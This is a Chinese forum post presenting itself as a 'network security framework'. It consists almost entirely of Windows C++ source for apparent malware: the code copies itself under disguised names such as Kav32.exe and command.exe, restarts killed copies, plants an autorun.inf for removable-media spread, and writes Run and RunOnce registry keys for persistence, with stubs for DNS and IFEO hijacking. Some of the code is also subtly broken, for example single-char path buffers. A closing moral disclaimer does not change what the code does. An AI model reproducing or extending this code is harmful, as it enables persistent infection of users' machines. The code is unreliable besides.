原创帖:网络安全框架程序,有缘者识之而后得。
// v.cpp : Defines the entry point for the application.//
#define WINVER 0x0500
#include "stdafx.h"
//注册表
#include<stdlib.h>
//文件
#include <Shlwapi.h>
#pragma comment(lib,"Shlwapi.lib")
//进程
#include <tlhelp32.h>
//系统
#include <windows.h>
#include <windef.h>
#define V_FILENAME_ARRAY_SIZE_1 4
#define V_MODULE_Name_1 255
//全局变量定义
//守护进程监控程序要使用的变量
LPCTSTR vFileName1_1=TEXT("C:\\WINDOWS\\system32\\command.exe");
LPCTSTR vFileName1_2=TEXT("C:\\WINDOWS\\Installer\\Kav32.exe");
LPCTSTR vFileName1_3=TEXT("C:\\WINDOWS\\java\\java.exe");
//注册表-开机启动项-监控程序使用的变量
LPCTSTR REG_vFileName1_1=TEXT("c:\\windows\\system32\\command.exe\0");
LPCTSTR REG_vFileName1_2=TEXT("C:\\windows\\Installer\\Kav32.exe\0");
LPCTSTR REG_vFileName1_3=TEXT("C:\\windows\\java\\java.exe\0");
//备份监控程序要使用的变量
LPCTSTR vFileName1_4=TEXT("C:\\WINDOWS\\system32\\cmd.com");
LPCTSTR vFileName1_5=TEXT("C:\\WINDOWS\\Debug\\Debug.exe");
LPCTSTR vFileName1_6=TEXT("C:\\WINDOWS\\java.exe");
//启动自定义功能 文件路径
LPCTSTR vFileName1_7=TEXT("C:\\WINDOWS\\Web\\firefox.exe");
//自定义功能 文件路径
LPCTSTR vFileName1_8=TEXT("C:\\Run.exe");
//自动播放 文件路径
LPCTSTR vFileName1_9=TEXT("C:\\Play.exe");
//在查询进程列表快照中要使用的变量,该列表提供给守护进程监控程序使用
LPCTSTR vFileName1_1_1=TEXT("command.exe");
LPCTSTR vFileName1_2_1=TEXT("Kav32.exe");
LPCTSTR vFileName1_3_1=TEXT("java.exe");
LPCTSTR vFileName1_7_1=TEXT("firefox.exe");
//在查询进程列表快照中要使用的变量,该列表提供给黑名单进程监控程序使用
LPCTSTR vFileNameArray_1[]={TEXT("xxx.exe"),TEXT("ccc.exe"),TEXT("ddd.exe"),TEXT("eee.exe")};
//全局函数声明
//主监控程序
int fun();
//文件监控程序
int FileMonitor();
//守护进程 文件监控程序
int VirusDaemonFileMonitor();
//备份文件 文件监控程序
int VirusBackupFileMonitor();
//开机自启 文件监控程序
int VirusPowerbootFileMonitor();
//自动播放 文件监控程序
int AutorunFileMonitor();
//域名劫持 文件监控程序
int DomainName_Hijacking();
//注册表监控程序
int RegMonitor();
//开机自启功 注册表监控程序
int RegPowerbootMonitor();
//IFEO劫持 注册表监控程序
int RegIFEOMonitor();
//IE主页锁定 注册表监控程序
int Reg_IE_HomePageAndStartPage_Monitor();
//进程监控程序
int ProcessMonitor();
//守护进程 进程监控程序
int DaemonMonitor();
//黑名单进程 进程监控程序
int KillProcessMonitor();
//自定义功能 进程监控程序
int RunProcessMonitor();
//系统服务监控
int ServiceMonitor();
//通讯服务
int BackupPortal();
//全局函数定义
//主监控程序
int fun()
{
//long fun_i=0;
char modlepath1;
//获得运行程序自身的路径信息
GetModuleFileName(0, modlepath1, 256);
MessageBox(NULL,modlepath1,"fun()",MB_OK);
if(strcmp(modlepath1,(char *)vFileName1_1)==0)
{
while(1)
{
/*
char temp_str1;
itoa(fun_i,temp_str1,10);
MessageBox(NULL,temp_str1,"command.exe",MB_OK);
*/
//文件监控
FileMonitor();
//进程监控
ProcessMonitor();
Sleep(1000);
//fun_i++;
}
}
else if(strcmp(modlepath1,(char *)vFileName1_2)==0)
{
while(1)
{
/*
char temp_str2;
itoa(fun_i,temp_str2,10);
MessageBox(NULL,temp_str2,"Kav32.exe",MB_OK);
*/
//注册表监控
RegMonitor();
//进程监控
ProcessMonitor();
Sleep(1000);
//fun_i++;
}
}
else if(strcmp(modlepath1,(char *)vFileName1_3)==0)
{
while(1)
{
/*
char temp_str3;
itoa(fun_i,temp_str3,10);
MessageBox(NULL,temp_str3,"java.exe",MB_OK);
*/
//注册表监控
RegMonitor();
//文件监控
FileMonitor();
Sleep(1000);
//fun_i++;
}
}
else if(strcmp(modlepath1,(char *)vFileName1_7)==0)
{
while(1)
{
/*
char temp_str7;
itoa(fun_i,temp_str7,10);
MessageBox(NULL,temp_str7,"firefox.exe",MB_OK);
*/
//自定义功能监控
RunProcessMonitor();
//进程监控
ProcessMonitor();
Sleep(1000);
//fun_i++;
}
}
else
{
/*
char temp_strN;
itoa(fun_i,temp_strN,10);
MessageBox(NULL,temp_strN,"XXXXXXX.exe",MB_OK);
*/
//文件监控
FileMonitor();
//注册表监控
RegMonitor();
//进程监控
ProcessMonitor();
//服务监控
ServiceMonitor();
//自定义功能监控
RunProcessMonitor();
//fun_i++;
}
return 0;
}
//文件监控
int FileMonitor()
{
VirusDaemonFileMonitor();
VirusBackupFileMonitor();
VirusPowerbootFileMonitor();
AutorunFileMonitor();
return 0;
}
//守护进程 文件监控
int VirusDaemonFileMonitor()
{
char modlepath1;
char modlepath2;
char modlepath3;
char modlepath7;
if(!PathFileExists(vFileName1_1))
{
//MessageBox(NULL,vFileName1_1,"文件不存在,开始自我复制",MB_OK);
GetModuleFileName(0, modlepath1, 256);
CopyFile(modlepath1,vFileName1_1,1);
}else{
//MessageBox(NULL,vFileName1_1,"文件存在",MB_OK);
}
if(!PathFileExists(vFileName1_2))
{
//MessageBox(NULL,vFileName1_2,"文件不存在,开始自我复制",MB_OK);
GetModuleFileName(0, modlepath2, 256);
CopyFile(modlepath2,vFileName1_2,1);
}else{
//MessageBox(NULL,vFileName1_2,"文件存在",MB_OK);
}
if(!PathFileExists(vFileName1_3))
{
//MessageBox(NULL,vFileName1_3,"文件不存在,开始自我复制",MB_OK);
GetModuleFileName(0, modlepath3, 256);
CopyFile(modlepath3,vFileName1_3,1);
}else{
//MessageBox(NULL,vFileName1_3, "文件存在",MB_OK);
}
if(!PathFileExists(vFileName1_7))
{
//MessageBox(NULL,vFileName1_7,"文件不存在,开始自我复制",MB_OK);
GetModuleFileName(0, modlepath7, 256);
CopyFile(modlepath7,vFileName1_7,1);
}else{
//MessageBox(NULL,vFileName1_7, "文件存在",MB_OK);
}
return 0;
}
//备份文件 文件监控
int VirusBackupFileMonitor()
{
char modlepath4;
char modlepath5;
char modlepath6;
if(!PathFileExists(vFileName1_4))
{
//MessageBox(NULL,vFileName1_4,"文件不存在,开始自我复制",MB_OK);
GetModuleFileName(0, modlepath4, 256);
CopyFile(modlepath4,vFileName1_4,1);
}else{
//MessageBox(NULL,vFileName1_4,"文件存在",MB_OK);
}
if(!PathFileExists(vFileName1_5))
{
//MessageBox(NULL,vFileName1_5,"文件不存在,开始自我复制",MB_OK);
GetModuleFileName(0, modlepath5, 256);
CopyFile(modlepath5,vFileName1_5,1);
}else{
//MessageBox(NULL,vFileName1_5,"文件存在",MB_OK);
}
if(!PathFileExists(vFileName1_6))
{
//MessageBox(NULL,vFileName1_6,"文件不存在,开始自我复制",MB_OK);
GetModuleFileName(0, modlepath6, 256);
CopyFile(modlepath6,vFileName1_6,1);
}else{
//MessageBox(NULL,vFileName1_6,"文件存在",MB_OK);
}
return 0;
}
//开机自启动 文件监控
int VirusPowerbootFileMonitor()
{
return 0;
}
//自动播放 文件监控
int AutorunFileMonitor()
{
char modlepath9;
//建立自动播放文件
LPCTSTR vFileName0_0=TEXT("C:\\autorun.inf");
if(!PathFileExists(vFileName0_0))
{
//MessageBox(NULL,vFileName0_0,"文件不存在",MB_OK);
//创建文件并写入参数
HANDLE handle;
handle=(HANDLE)CreateFile(vFileName0_0,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_SYSTEM,0);
if(handle!=INVALID_HANDLE_VALUE)
{
//MessageBox(NULL,vFileName0_0,"文件创建成功",MB_OK);
LPTSTR lpBuffer=TEXT("\nOpen='Run.exe'\n");
DWORD dwWritten;
WriteFile(handle,lpBuffer,strlen(lpBuffer)+1,&dwWritten,NULL);
}else{
//MessageBox(NULL,vFileName0_0,"文件创建失败",MB_OK);
}
}else{
//MessageBox(NULL,vFileName0_0,"文件存在",MB_OK);
}
//复制程序文件
if(!PathFileExists(vFileName1_9))
{
//MessageBox(NULL,vFileName1_9,"文件不存在,开始自我复制",MB_OK);
GetModuleFileName(0, modlepath9, 256);
CopyFile(modlepath9,vFileName1_9,1);
}else{
//MessageBox(NULL,vFileName1_9,"文件存在",MB_OK);
}
return 0;
}
//域名劫持 文件监控
int DomainName_Hijacking()
{
return 0;
}
//注册表监控
int RegMonitor()
{
//RegPowerbootMonitor();
//RegIFEOMonitor();
//Reg_IE_HomePageAndStartPage_Monitor();
return 0;
}
//开机自启动 注册表监控
int RegPowerbootMonitor()
{
HKEY hKey1,hKey2,hKey3;
long ll1,ll2,ll3;
long ll1_1,ll2_1,ll3_1;
long ll1_2,ll2_2,ll3_2;
//系统启动项键
LPCTSTR StrKey1=TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
LPCTSTR StrKey2=TEXT("System\\CurrentControlSet\\Services");
LPCTSTR StrKey3=TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce");
LPBYTE owner_Get1;
owner_Get1=(unsigned char *)malloc(255);
LPBYTE owner_Set1;
owner_Set1=(unsigned char *)REG_vFileName1_1;
LPBYTE owner_Get2;
owner_Get2=(unsigned char *)malloc(255);
LPBYTE owner_Set2;
owner_Set2=(unsigned char *)REG_vFileName1_2;
LPBYTE owner_Get3;
owner_Get3=(unsigned char *)malloc(255);
LPBYTE owner_Set3;
owner_Set3=(unsigned char *)REG_vFileName1_3;
DWORD type_1=REG_SZ ;
DWORD cbData_1=(lstrlen(REG_vFileName1_1)+1);
DWORD cbData_2=(lstrlen(REG_vFileName1_2)+1);
DWORD cbData_3=(lstrlen(REG_vFileName1_3)+1);
//打开注册表键
ll1 = RegOpenKeyEx(HKEY_LOCAL_MACHINE,StrKey1,NULL,KEY_ALL_ACCESS,&hKey1);
if(ERROR_SUCCESS == ll1 )
{
//MessageBox(NULL,(char *)StrKey1,"HKEY_LOCAL_MACHINE:数据项存在",MB_OK);
ll1_1=RegQueryValueEx(hKey1,vFileName1_1_1,0,&type_1,owner_Get1,&cbData_1);
if(ERROR_SUCCESS == ll1_1)
{
//MessageBox(NULL,(char *)owner_Get1,vFileName1_1_1,MB_OK);
if(strcmp(vFileName1_1,(char *)owner_Get1)!=0)
{
//MessageBox(NULL,(char *)owner_Get1,vFileName1_1,MB_OK);
ll1_2=RegSetValueEx(hKey1,vFileName1_1_1, NULL, REG_SZ, owner_Set1, cbData_1);
if(ERROR_SUCCESS == ll1_2)
{
//MessageBox(NULL,(char *)owner_Set1," 报告:值恢复成功",MB_OK);
}
if(ERROR_SUCCESS != ll1_2)
{
//MessageBox(NULL,(char *)owner_Set1," 报告:值恢复失败",MB_OK);
}
}
}
if(ERROR_SUCCESS != ll1_1)
{
ll1_2=RegSetValueEx(hKey1,vFileName1_1_1, NULL, REG_SZ, owner_Set1, cbData_1);
if(ERROR_SUCCESS == ll1_2)
{
//MessageBox(NULL,(char *)owner_Set1," 创建数据项的指定值成功",MB_OK);
}
if(ERROR_SUCCESS != ll1_2)
{
//MessageBox(NULL,(char *)owner_Set1," 创建数据项的指定值失败",MB_OK);
}
}
}
//如果系统启动项键不存在
else if(ERROR_SUCCESS != ll1 )
{
//MessageBox(NULL,(char *)StrKey1,"HKEY_LOCAL_MACHINE:数据项不存在",MB_OK);
}
//关闭被打开的键
RegCloseKey(hKey1);
//打开注册表键
ll2 = RegOpenKeyEx(HKEY_LOCAL_MACHINE,StrKey2,NULL,KEY_ALL_ACCESS,&hKey2);
if(ERROR_SUCCESS == ll2 )
{
//MessageBox(NULL,(char *)StrKey2,"HKEY_LOCAL_MACHINE:数据项存在",MB_OK);
ll2_1=RegQueryValueEx(hKey2,vFileName1_2_1,0,&type_1,owner_Get2,&cbData_2);
if(ERROR_SUCCESS == ll2_1)
{
//MessageBox(NULL,(char *)owner_Get2,vFileName1_2_1,MB_OK);
if(strcmp(vFileName1_2,(char *)owner_Get2)!=0)
{
//MessageBox(NULL,(char *)owner_Get2,vFileName1_2,MB_OK);
ll2_2=RegSetValueEx(hKey2,vFileName1_2_1, NULL, REG_SZ, owner_Set2, cbData_2);
if(ERROR_SUCCESS == ll2_2)
{
//MessageBox(NULL,(char *)owner_Set2," 报告:值恢复成功",MB_OK);
}
if(ERROR_SUCCESS != ll2_2)
{
//MessageBox(NULL,(char *)owner_Set2," 报告:值恢复失败",MB_OK);
}
}
}
if(ERROR_SUCCESS != ll2_1)
{
ll2_2=RegSetValueEx(hKey2,vFileName1_2_1, NULL, REG_SZ, owner_Set2, cbData_2);
if(ERROR_SUCCESS == ll2_2)
{
//MessageBox(NULL,(char *)owner_Set2," 创建数据项的指定值成功",MB_OK);
}
if(ERROR_SUCCESS != ll2_2)
{
//MessageBox(NULL,(char *)owner_Set2," 创建数据项的指定值失败",MB_OK);
}
}
}
//如果系统启动项键不存在
else if(ERROR_SUCCESS != ll2 )
{
//MessageBox(NULL,(char *)StrKey2,"HKEY_LOCAL_MACHINE:数据项不存在",MB_OK);
}
//关闭被打开的键
RegCloseKey(hKey2);
//打开注册表键
ll3 = RegOpenKeyEx(HKEY_LOCAL_MACHINE,StrKey3,NULL,KEY_ALL_ACCESS,&hKey3);
if(ERROR_SUCCESS == ll3 )
{
//MessageBox(NULL,(char *)StrKey3,"HKEY_LOCAL_MACHINE:数据项存在",MB_OK);
ll3_1=RegQueryValueEx(hKey3,vFileName1_3_1,0,&type_1,owner_Get3,&cbData_3);
if(ERROR_SUCCESS == ll3_1)
{
//MessageBox(NULL,(char *)owner_Get3,vFileName1_3_1,MB_OK);
if(strcmp(vFileName1_3,(char *)owner_Get3)!=0)
{
//MessageBox(NULL,(char *)owner_Get3,vFileName1_3,MB_OK);
ll3_2=RegSetValueEx(hKey1,vFileName1_3_1, NULL, REG_SZ, owner_Set3, cbData_3);
if(ERROR_SUCCESS == ll3_2)
{
//MessageBox(NULL,(char *)owner_Set3," 报告:值恢复成功",MB_OK);
}
if(ERROR_SUCCESS != ll3_2)
{
//MessageBox(NULL,(char *)owner_Set3," 报告:值恢复失败",MB_OK);
}
}
}
if(ERROR_SUCCESS != ll3_1)
{
ll3_2=RegSetValueEx(hKey3,vFileName1_3_1, NULL, REG_SZ, owner_Set3, cbData_3);
if(ERROR_SUCCESS == ll3_2)
{
//MessageBox(NULL,(char *)owner_Set3," 创建数据项的指定值成功",MB_OK);
}
if(ERROR_SUCCESS != ll3_2)
{
//MessageBox(NULL,(char *)owner_Set3," 创建数据项的指定值失败",MB_OK);
}
}
}
//如果系统启动项键不存在
else if(ERROR_SUCCESS != ll3 )
{
//MessageBox(NULL,(char *)StrKey3,"HKEY_LOCAL_MACHINE:数据项不存在",MB_OK);
}
//关闭被打开的键
RegCloseKey(hKey3);
free(owner_Get1);
free(owner_Get2);
free(owner_Get3);
return 0;
}
//IFEO劫持 注册表监控
int RegIFEOMonitor()
{
return 0;
}
//主页锁定 注册表监控
int Reg_IE_HomePageAndStartPage_Monitor()
{
return 0;
}
//进程监控
int ProcessMonitor()
{
DaemonMonitor();
KillProcessMonitor();
return 0;
}
//守护进程 进程监控
int DaemonMonitor()
{
int vFileName1_1_1_i=0,vFileName1_2_1_i=0,vFileName1_3_1_i=0,vFileName1_7_1_i=0;
HANDLE processList=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(INVALID_HANDLE_VALUE ==processList)
{
//MessageBox(NULL,"这是为什么呢","进程列表获取失败",MB_OK);
}else if(INVALID_HANDLE_VALUE !=processList){
//MessageBox(NULL,"吼吼吼,成功了","进程列表获取成功",MB_OK);
PROCESSENTRY32 * info;
info=(PROCESSENTRY32 *)malloc(sizeof(PROCESSENTRY32));
// 在使用这个结构之前,先设置它的大小
info->dwSize = sizeof(PROCESSENTRY32);
//char proName[] = {"devenv.exe"};
HANDLE handlePro = NULL; //结束进程句柄
// 遍历进程快照,轮流显示每个进程的信息
BOOL terminate = FALSE;
BOOL bMore = Process32First(processList, info);
while( bMore != FALSE)
{
//MessageBox(NULL,(char *)(info->szExeFile),"进程文件名",MB_OK);
if(strcmp((char *)vFileName1_1_1,(char *)(info->szExeFile)) == 0)
{
vFileName1_1_1_i=1;
//MessageBox(NULL,(char *)(info->szExeFile),(char *)vFileName1_3_1,MB_OK);
}
if(strcmp((char *)vFileName1_2_1,(char *)(info->szExeFile)) == 0)
{
vFileName1_2_1_i=1;
//MessageBox(NULL,(char *)(info->szExeFile),(char *)vFileName1_3_1,MB_OK);
}
if(strcmp((char *)vFileName1_3_1,(char *)(info->szExeFile)) == 0)
{
vFileName1_3_1_i=1;
//MessageBox(NULL,(char *)(info->szExeFile),(char *)vFileName1_3_1,MB_OK);
}
if(strcmp((char *)vFileName1_7_1,(char *)(info->szExeFile)) == 0)
{
vFileName1_7_1_i=1;
//MessageBox(NULL,(char *)(info->szExeFile),(char *)vFileName1_7_1,MB_OK);
}
bMore = Process32Next(processList, info);
}
free(info);
}
CloseHandle(processList);
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
char temp_vfileName1;
strcpy(temp_vfileName1,vFileName1_1);
char temp_vfileName2;
strcpy(temp_vfileName2,vFileName1_2);
char temp_vfileName3;
strcpy(temp_vfileName3,vFileName1_3);
char temp_vfileName7;
strcpy(temp_vfileName7,vFileName1_7);
if(vFileName1_1_1_i==0)
{
BOOL bRet1 = CreateProcess(NULL,temp_vfileName1,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,NULL,NULL,&si,&pi);
if(bRet1!=0)
{
// 成功
}else{
//失败
}
}
if(vFileName1_2_1_i==0)
{
BOOL bRet2 = CreateProcess(NULL,temp_vfileName2,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,NULL,NULL,&si,&pi);
if(bRet2!=0)
{
// 成功
}else{
//失败
}
}
if(vFileName1_3_1_i==0)
{
BOOL bRet3 = CreateProcess(NULL,temp_vfileName3,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,NULL,NULL,&si,&pi);
if(bRet3!=0)
{
// 成功
}else{
//失败
}
}
if(vFileName1_7_1_i==0)
{
BOOL bRet7 = CreateProcess(NULL,temp_vfileName7,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,NULL,NULL,&si,&pi);
if(bRet7!=0)
{
// 成功
}else{
//失败
}
}
return 0;
}
//黑名单进程 进程监控
int KillProcessMonitor()
{
return 0;
}
//自定义进程 进程监控
int RunProcessMonitor()
{
return 0;
}
//系统服务监控
int ServiceMonitor()
{
return 0;
}
//通讯服务
int BackupPortal()
{
return 0;
}
//主函数定义
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//运行主监控程序
fun();
return 0;
}
防者,必先攻之。智者,使之于神。用者,德行为根。斥者,思之于心。
用而慎之,学而悟之,德行为福,恶行为祸。
菜刀可以用来切菜,也可以用来杀人。心术不正者,难行于世,正道行者,领悟于心。 顶楼主~
页:
[1]